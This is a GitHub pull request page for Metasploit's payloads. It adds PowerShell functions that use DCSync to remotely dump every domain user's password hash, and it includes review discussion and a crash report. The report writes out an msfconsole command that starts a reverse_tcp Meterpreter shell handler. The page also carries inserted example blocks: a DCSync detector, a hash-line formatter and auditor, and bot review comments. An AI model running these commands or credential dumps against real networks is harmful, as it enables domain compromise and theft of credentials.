Add ability to dcsync & hashdump via Powershell #284

Merged
merged 3 commits into from May 17, 2018

@OJ
Contributor

OJ commented May 7, 2018

Description

This PR makes use of the fact that DCSync functionality is exposed via Kiwi, and from this it is possible to enumerate all users in the domain and dump each user's hash one by one. This means that it's possible to remotely dump all the hashes in a target DC using DCsync instead of having to get onto the DC and use the typical methods.

This code has a few extension functions built into the runner, and also has some baked-in powershell functions that are available in every powershell runner session in the host.

I've also added a powershell version of the build command that lets us generate the source to the powershell assembly wiring from PSH as well as Python.

I haven't exposed this feature in any other way just yet, for $REASONS. I will consider other options at some point, but for now this should be useful. Here's a demo of it running on a domain-joined machine that isn't a DC.

[demo screenshot: the new functions running on a domain-joined machine that isn't a DC]

The addition of the following built-in functions should make interacting with the functionality much easier:

  • Invoke-DcSync
  • Invoke-DcSyncAll
  • Invoke-DcSyncHashDump

Note 1

This rework has juggled with how powershell_shell works. It now does the commands on a separate thread and lets the UI receive a response. This allows the work to be done behind the scenes and streamed back via the channel. This allows for long running processes to run. Woo!

Note 2

I've commented out the support for creds_all in both PSH and Python bindings because they don't work after the rejig of the Kiwi source to use the Mimikatz subrepo. I'll work on getting it going again in both cases. So watch this space.

Validation

  • Make sure that the classic usages still work (powershell_import, powershell_execute) with different session IDs.
  • Validate that powershell_shell behaves appropriately with short or single-shot commands.
  • Validate that powershell_shell doesn't hang when long running commands are run.
  • Validate that Get-ChildItem function:\ | Select Name | sls 'DcSync' shows the list of newly baked-in powershell scripts.
  • Validate that each script has appropriate documentation via the Get-Help commandlet.
  • Validate that each of the new scripts works as advertised.
  • Validate that x64 is fine.
  • Validate that x86 is fine.
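Defender-side counterpart to the description above, added here as an example and not code from this PR or from metasploit-payloads: a DCSync request looks to the domain controller like ordinary replication, so the DC records it as a directory-service access audit carrying the replication control-access-right GUIDs, and the useful check is whether the requesting account is a real DC. The three GUIDs are the standard Active Directory identifiers; the `key=value` record layout, the account names and the `KNOWN_DC_ACCOUNTS` allow-list are constructed assumptions.

```python
"""Flag DCSync-style replication requests in directory-service audit records.

Added example: it is not part of metasploit-payloads. The record layout,
account names and the allow-list below are constructed; only the GUIDs are
real Active Directory control-access-right identifiers.
"""
from dataclasses import dataclass, field

# Control access rights a replication partner (or a DCSync client) needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allow-list: computer accounts of the domain's real DCs.
KNOWN_DC_ACCOUNTS = {"CORP\\DC01$", "CORP\\DC02$"}


@dataclass
class AuditRecord:
    subject: str                                    # DOMAIN\account that requested access
    object_type: str                                # type of the object accessed
    properties: list = field(default_factory=list)  # access-right GUIDs, lower-cased


def parse_record(line):
    """Parse one constructed 'key=value; key=value' audit line into an AuditRecord."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.strip().partition("=")
        fields[key.strip()] = value.strip()
    subject = f"{fields['SubjectDomainName']}\\{fields['SubjectUserName']}"
    guids = [g.strip("{}").lower() for g in fields.get("Properties", "").split()]
    return AuditRecord(subject, fields.get("ObjectType", ""), guids)


def dcsync_alerts(records, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (subject, [rights]) for replication requests made by non-DC accounts."""
    dcs = {d.upper() for d in known_dcs}
    alerts = []
    for rec in records:
        rights = [REPLICATION_RIGHTS[g] for g in rec.properties if g in REPLICATION_RIGHTS]
        if not rights or rec.subject.upper() in dcs:
            continue  # not a replication request, or expected DC-to-DC replication
        alerts.append((rec.subject, rights))
    return alerts


# Constructed sample records: one legitimate DC, one user account asking for
# replication rights, and one unrelated object access with a made-up GUID.
SAMPLE_LINES = [
    "SubjectUserName=DC02$; SubjectDomainName=CORP; ObjectType=domainDNS; "
    "Properties={1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}",
    "SubjectUserName=jsmith; SubjectDomainName=CORP; ObjectType=domainDNS; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "SubjectUserName=jsmith; SubjectDomainName=CORP; ObjectType=user; "
    "Properties={00000000-0000-0000-0000-000000000001}",  # constructed, non-replication GUID
]


def scan(lines=SAMPLE_LINES):
    """Parse and evaluate a batch of lines; returns the alert list."""
    return dcsync_alerts(parse_record(line) for line in lines)


if __name__ == "__main__":
    for subject, rights in scan():
        print(f"ALERT: {subject} requested {', '.join(rights)}")
```

The allow-list is the whole trick: replication rights requested by a DC computer account are routine, while the same rights requested by a user account are exactly what the functions listed above produce, so the alert logic keys on the subject rather than on the rights alone.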

@OJ OJ requested a review from busterb May 7, 2018

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from d6cb38d to fbb8f6f May 7, 2018

Add ability to dcsync & hashdump via Powershell
DCSync functionality is exposed, and from this it is possible to enumerate all users in the domain and dump each user's hash one by one. This code has a few extension functions built into the runner, and also has some baked-in powershell functions that are available in every powershell runner session in the host.

I've also added a powershell version of the build command that lets us generate the source to the powershell assembly wiring from PSH as well as Python.

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from fbb8f6f to f44877a May 7, 2018

Rework powershell_shell to work with "streaming"
This commit changes the channel functionality within the powershell extension so that commands do execute behind the scenes and stream the results to the UI in the current channel.

This comes with the caveat that users are patient. I haven't yet made sure that running separate commands while long running ones are running will not cause problems. We'll have to see.
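The threading model this commit message describes, as an added illustration rather than the extension's own C++ code: a worker thread runs the command and pushes output chunks into a channel queue that the UI polls, so a long-running command no longer blocks the session while a single-shot command still returns promptly. The producers and timings are constructed stand-ins for a real PowerShell pipeline, and the one-command-at-a-time rule is a conservative way of handling the caveat raised above, which the original leaves untested.

```python
"""Stream command output from a worker thread through a channel the UI polls.

Added example, not the powershell extension's own code. The slow producer
and timings are constructed stand-ins for a real PowerShell pipeline.
"""
import queue
import threading
import time


class StreamingShell:
    """Runs one command at a time on a worker thread; output chunks flow through a queue."""

    DONE = object()  # sentinel written to the channel when a command finishes

    def __init__(self):
        self.channel = queue.Queue()
        self._worker = None

    def busy(self):
        return self._worker is not None and self._worker.is_alive()

    def run(self, command, producer):
        """Start `command`; returns False (and does nothing) if one is still running."""
        if self.busy():
            return False  # conservative: refuse to interleave two commands on one channel

        def work():
            try:
                for chunk in producer(command):
                    self.channel.put(chunk)  # stream partial output as it appears
            finally:
                self.channel.put(self.DONE)

        self._worker = threading.Thread(target=work, daemon=True)
        self._worker.start()
        return True

    def poll(self, timeout=0.05):
        """UI-side read that never blocks for long; None means nothing arrived yet."""
        try:
            return self.channel.get(timeout=timeout)
        except queue.Empty:
            return None


def slow_producer(command):
    """Constructed stand-in for a long-running pipeline that emits output gradually."""
    for i in range(3):
        time.sleep(0.05)
        yield f"{command}: line {i}\n"


def single_shot_producer(command):
    """Constructed stand-in for a command that returns all its output at once."""
    yield f"{command}: done\n"


def drain(shell, timeout=2.0):
    """Collect chunks until the DONE sentinel; a real UI would print each as it arrives."""
    chunks, deadline = [], time.monotonic() + timeout
    while time.monotonic() < deadline:
        item = shell.poll()
        if item is None:
            continue
        if item is StreamingShell.DONE:
            return chunks
        chunks.append(item)
    raise TimeoutError("command did not finish")


def run_and_collect(command, producer):
    """Run one command to completion and return every chunk it streamed."""
    shell = StreamingShell()
    shell.run(command, producer)
    return drain(shell)


if __name__ == "__main__":
    shell = StreamingShell()
    shell.run("Get-ChildItem", slow_producer)
    print("second command accepted while busy:", shell.run("ls", slow_producer))
    print("".join(drain(shell)), end="")
```

The `DONE` sentinel is what lets the UI distinguish "no output yet" from "command finished" on the same channel; without it a quiet long-running command and a completed one look identical to the poller.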

@OJ OJ force-pushed the OJ:powershell-add-hashdump-dcsync branch from 4f413dc to 90265c5 May 7, 2018

@OJ

Contributor

OJ commented May 14, 2018

cough BUMP! 😈

Change hash output to use LM hash if present
The previous commit hard coded the LM hash to the empty value. This commit changes this so that if the LM hash isn't present it'll manually specify the empty one, but use the existing one if it is present.
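The "empty LM hash unless one is stored" rule from this commit, carried into a small added example that is not code from the PR: it writes pwdump-style lines with the conventional empty-LM placeholder when no LM hash exists, and, on the defender side, reads such lines back to find accounts that still carry a real LM hash, which means LM storage had not been disabled when that password was set. The `DOMAIN\user:RID:LM:NT:::` layout is an assumption about the output format, and every hash value below is constructed.

```python
"""Build and audit pwdump-style hash lines, keeping a stored LM hash when one exists.

Added example, not code from this PR. The line layout (DOMAIN\\user:RID:LM:NT:::)
is an assumption about the output format; the hash values below are constructed.
"""

# LM hash of the empty string: the conventional placeholder written when an
# account has no LM hash stored (the default on modern domains).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def format_hash_line(domain, user, rid, nt_hash, lm_hash=None):
    """Emit one line; use the real LM hash if present, else the empty placeholder."""
    lm = lm_hash.lower() if lm_hash else EMPTY_LM_HASH
    return f"{domain}\\{user}:{rid}:{lm}:{nt_hash.lower()}:::"


def parse_hash_line(line):
    """Split a pwdump-style line into (account, rid, lm, nt)."""
    account, rid, lm, nt = line.split(":")[:4]
    return account, int(rid), lm.lower(), nt.lower()


def accounts_with_lm_hash(lines):
    """Accounts whose stored LM hash is real rather than the empty placeholder.

    LM hashes are trivially recovered, so any hit means the
    'Do not store LAN Manager hash value on next password change' policy
    was not in force when that password was last set.
    """
    return [parse_hash_line(line)[0] for line in lines
            if parse_hash_line(line)[2] != EMPTY_LM_HASH]


# Constructed sample dump: one modern account, one account with a legacy LM hash.
SAMPLE_LINES = [
    format_hash_line("CORP", "svc_backup", 1105, "0123456789abcdef0123456789abcdef"),
    format_hash_line("CORP", "legacy_app", 1106, "fedcba9876543210fedcba9876543210",
                     lm_hash="00112233445566778899aabbccddeeff"),
]

if __name__ == "__main__":
    print("\n".join(SAMPLE_LINES))
    print("accounts still storing an LM hash:", accounts_with_lm_hash(SAMPLE_LINES))
```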

@busterb busterb self-assigned this May 17, 2018

@busterb

Contributor

busterb commented May 17, 2018

Code review spots nothing obviously wrong. Let's test this.

@@ -538,6 +569,151 @@ DWORD powershell_channel_close(Channel* channel, Packet* request, LPVOID context
return ERROR_SUCCESS;
}
DWORD channelise_session(wchar_t* sessionId, Channel* channel, LPVOID context)
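Review bot: the new `DWORD channelise_session(wchar_t* sessionId, Channel* channel, LPVOID context)` declaration at the end of this hunk has no header comment saying what the return value means or whether the session keeps a reference to `channel` after the call; since the hunk grows this region from 6 to 151 lines of channel and thread plumbing, a short comment above the function (purpose, return semantics, ownership of `channel`) would make the next review much easier.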

@busterb

busterb May 17, 2018

Contributor

you win this time channelise

@wvu-r7

wvu-r7 May 17, 2018

Contributor

Clearly @OJ named this function.

@OJ

OJ May 17, 2018

Contributor

Don't abuse our beloved language with unnecessary zzzzzz's!

0x80, 0x02, 0x33, 0x00, 0xa5, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x86, 0x08,
0x7e, 0x0b, 0x3a, 0x03, 0x34, 0x00, 0xad, 0x2c, 0x00, 0x00, 0x00, 0x00,
0x86, 0x08, 0x86, 0x0b, 0x3e, 0x03, 0x34, 0x00, 0xb6, 0x2c, 0x00, 0x00,
0x00, 0x00, 0x86, 0x08, 0x8e, 0x0b, 0x3a, 0x03, 0x35, 0x00, 0xbe, 0x2c
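Review bot: this embedded byte array carries no comment stating which assembly it is or how it was produced; since the description says a build command now generates this wiring from PowerShell as well as Python, a one-line comment above the array naming that generator and the source assembly would let a reviewer regenerate and compare the blob instead of taking it on trust.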

@busterb

busterb May 17, 2018

Contributor

I had a wild hair earlier that maybe this could be reworked to use a resource file rather than converting to a C string in some future PR.

@OJ

OJ May 17, 2018

Contributor

Resources come with a diff set of issues, esp when reflectively loading DLLs. This was "simpler". :)

@busterb

Contributor

busterb commented May 17, 2018

Seems fine enough to get a gem going.

@busterb busterb merged commit 1e175da into rapid7:master May 17, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

busterb added a commit that referenced this pull request May 17, 2018

@OJ

Contributor

OJ commented May 17, 2018

Much ❤️ to both of you!

@OJ OJ deleted the OJ:powershell-add-hashdump-dcsync branch May 17, 2018

@busterb

Contributor

busterb commented May 17, 2018

Well, I found a post-landing bug in the light of the morning (Windows 10 latest) with metasploit-framework head.

./msfconsole -qx 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.56.1; run'
...
meterpreter > powershell_shell 
PS > ls

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

It's not in framework yet as a gem bump, so not a big deal. Taking a look to see what needs to be done to fix it up.

@busterb

Contributor

busterb commented May 17, 2018

[584] [1b70] [COMMAND] Calling completion handlers... 
[584] [1b70] [COMMAND] Completion handlers finished for core_channel_write. 
[584] [1b70] [COMMAND] Packet is not local, destroying 
[584] [1b70] [COMMAND] Packet destroyed 
[584] [1b70] [COMMAND] Command processing finishing. Returning: TRUE 
[584] [1b70] [COMMAND] Executed inline -> Commands: 02822AB8 Command1: 00A74020 Command2: 00000000 
[584] [1b70] [COMMAND] Cleaning up commands 
[584] CLR: Managed code called FailFast, saying "
[584] Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
[584] " 
@OJ

Contributor

OJ commented May 17, 2018

Was that x64?

@busterb

Contributor

busterb commented May 17, 2018

32-bit windows/meterpreter/reverse_tcp

@OJ

Contributor

OJ commented May 21, 2018

Did you end up looking at this again @busterb or do I need to jump in and figure it out?

@busterb

Contributor

busterb commented May 21, 2018

Hi. I just refreshed to ask the same question :) I have not, other than to have reviewed some of the memory allocations for obvious faults.

@OJ

Contributor

OJ commented May 21, 2018

I've just fixed it :) PR coming!

@busterb

Contributor

busterb commented May 21, 2018

🥇 thanks!

busterb added a commit to busterb/metasploit-framework that referenced this pull request May 21, 2018

update kiwi plugin, add dcshadow and powershell streaming support
This does a few things:

 1. Updates the kiwi plugin to mimikatz 2.1.1 20180502
 2. Adds ability to dcsync & hashdump via Powershell
 3. Adds streaming support to powershell commands (no more timeouts)

It also adds the following powershell functions to make things more
convenient:

 * Invoke-DcSync
 * Invoke-DcSyncAll
 * Invoke-DcSyncHashDump

See rapid7/metasploit-payloads#284 for details